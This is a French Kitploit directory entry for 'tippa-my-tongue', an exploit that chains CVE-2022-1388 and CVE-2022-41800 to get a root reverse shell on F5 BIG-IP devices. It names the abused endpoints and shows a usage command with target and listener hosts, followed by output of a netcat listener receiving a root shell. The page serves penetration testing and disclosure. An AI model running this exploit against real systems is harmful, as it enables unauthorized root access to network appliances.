Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
tippa-my-tongue — Exploit F5 BIG-IP utilisant CVE-2022-1388 et CVE-2022-41800 | Kitploit
Outils/GitHubGitHub/j-baines/tippa-my-tongue
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleRed Teaming
GitHubj-baines/tippa-my-tongue

tippa-my-tongue

Exploit F5 BIG-IP utilisant CVE-2022-1388 et CVE-2022-41800

Voir le dépôt
133il y a 3 ansPas encore vérifié
Site web

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Tippa My Tongue

Tippa My Tongue est un exploit qui utilise CVE-2022-1388 et CVE-2022-41800 pour établir un shell inversé root sur les produits F5 BIG-IP. La plupart des exploits de CVE-2022-1388 obtiennent l'exécution de code via /mgmt/tm/util/bash. Cependant, cet exploit utilise /mgmt/shared/iapp/rpm-spec-creator, suivi de /mgmt/shared/iapp/build-package. Cette approche a été suggérée pour la première fois par Ron Bowes dans cette analyse d'AttackerKB. Bien qu'à ma connaissance, personne n'ait jamais publié un exploit CVE-2022-1388 qui fasse exactement cela.

Pour plus de détails, lisez l'article de VulnCheck.

Exemple d'utilisation :

root@kitploit:~
albinolobster@mournland:~/tippa-my-tongue$ python3 tippa-my-tongue.py --rhost 10.9.49.191 --lhost 10.9.49.194

   ▄▄▄▄▄▪   ▄▄▄· ▄▄▄· ▄▄▄·     • ▌ ▄ ·.  ▄· ▄
   •██  ██ ▐█ ▄█▐█ ▄█▐█ ▀█     ·██ ▐███▪▐█▪██
    ▐█.▪▐█· ██▀· ██▀·▄█▀▀█     ▐█ ▌▐▌▐█·▐█▌▐█▪
    ▐█▌·▐█▌▐█▪·•▐█▪·•▐█ ▪▐▌    ██ ██▌▐█▌ ▐█▀·.
    ▀▀▀ ▀▀▀.▀   .▀    ▀  ▀     ▀▀  █▪▀▀▀  ▀ •
         ▄▄▄▄▄       ▐ ▄  ▄▄ • ▄• ▄▌▄▄▄ .
         •██  ▪     •█▌▐█▐█ ▀ ▪█▪██▌▀▄.▀·
          ▐█.▪ ▄█▀▄ ▐█▐▐▌▄█ ▀█▄█▌▐█▌▐▀▀▪▄
          ▐█▌·▐█▌.▐▌██▐█▌▐█▄▪▐█▐█▄█▌▐█▄▄▌
          ▀▀▀  ▀█▄▀▪▀▀ █▪·▀▀▀▀  ▀▀▀  ▀▀▀

                 CVE-2022-1388
                 CVE-2022-41800

                       🦞

[+] Exécution de l'écouteur netcat
[+] Utilisation de /usr/bin/nc
Écoute sur 0.0.0.0 1270
[+] Envoi de la requête initiale vers rpm-spec-creator
[+] Envoi de la tentative d'exploit vers build-package
Connexion reçue sur 10.9.49.191 47152
bash: pas de contrôle de tâche dans ce shell
[@localhost:NO LICENSE:Standalone] BUILD # pwd
pwd
/var/config/rest/node/tmp/BUILD
[@localhost:NO LICENSE:Standalone] BUILD # id
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
[@localhost:NO LICENSE:Standalone] BUILD #
Télécharger l’outil

Remerciements

  • Ron Bowes : pour avoir découvert ces points de terminaison et les avoir partagés avec le monde
  • RHCP : pour être funky